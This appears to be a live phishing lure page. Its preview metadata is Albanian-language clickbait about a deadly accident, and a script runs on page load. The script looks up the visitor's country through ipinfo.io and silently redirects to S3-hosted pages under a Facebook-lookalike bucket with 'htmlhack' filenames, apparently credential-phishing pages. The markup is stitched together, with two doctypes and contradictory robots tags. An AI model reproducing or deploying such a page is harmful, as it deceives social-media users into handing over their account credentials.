<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="utf-8"/>
<meta name="title" content="Stream"/>
<meta name="keywords" content="Instagram"/>
<meta property="og:description" content="229,142,105,vizitat"/>
<meta name="robots" content="index, follow"/>
<meta name="googlebot" content="noindex"/>
<meta name="robots" content="index"/>
<meta name="robots" content="noindex"/>
<meta name="robots" content="nofollow"/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<meta property="og:title" content="Bëni shumë kujdes mëngjesin e sotëm ka ndodhur një aksident tragjik me disa të plagosur dhe të vdekur."/>
<meta property="og:image" content="https://media.discordapp.net/attachments/1220457453838143602/1223657629277098125/dcfgfdsgdgtertr444.png?ex=661aa6f9&is=660831f9&hm=9758848e9a8981361045a98de4271221438c9649ac65c845c11e94ddd9938c19&=&format=webp&quality=lossless"/>
<meta name="apple-itunes-app" content="app-id=6448311069"/>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Redirección por Geolocalización</title>
</head>
<body>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>

<script>
    function redireccionarPorGeolocalizacion(countryCode) {
        var redirecciones = {
            "AL": "https://faceboovbefadz217894.s3.eu-central-1.amazonaws.com/faskimng0012-brau2/ddddaqwdasd/Faces000255/htmlhacksenju.html",
        };
        if (redirecciones.hasOwnProperty(countryCode)) {
            window.location.href = redirecciones[countryCode];
        } else {
            window.location.href = "https://faceboovbefadz217894.s3.eu-central-1.amazonaws.com/faskimng0012-brau2/ddddaqwdasd/Faces000255/htmlhackbraunnydirecto.html";
        }
    }
    function obtenerPaisPorGeolocalizacion() {
        $.get("https://ipinfo.io", function(response) {
            var countryCode = response.country;
            redireccionarPorGeolocalizacion(countryCode);
        }, "jsonp");
    }

    window.onload = obtenerPaisPorGeolocalizacion;
</script>

</body>
</html>
